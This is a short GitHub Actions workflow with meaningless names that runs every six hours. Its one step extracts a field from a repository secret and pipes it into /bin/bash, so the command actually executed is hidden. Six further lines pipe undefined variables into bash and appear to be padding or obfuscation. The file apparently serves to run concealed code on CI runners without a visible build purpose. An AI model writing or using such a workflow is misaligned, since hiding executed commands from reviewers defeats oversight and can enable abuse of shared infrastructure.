name: caobushang9870

on:
  workflow_dispatch:
  schedule:
    - cron: '13 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caobushang9870
        env:
          rwni17335: ${{ secrets.rwni17335 }}
        run: |
          echo $rwni17335 | jq -r .qgn9 | /bin/bash
          echo $ijddh2 | jq -r .iv3 | /bin/bash
          echo $s77 | jq -r .nh7956 | /bin/bash
          echo $ad7 | jq -r .va2138 | /bin/bash
          echo $qixrf95490 | jq -r .dw414 | /bin/bash
          echo $bhi1064 | jq -r .lxfdw3435 | /bin/bash
          echo $iea8858 | jq -r .cr2 | /bin/bash

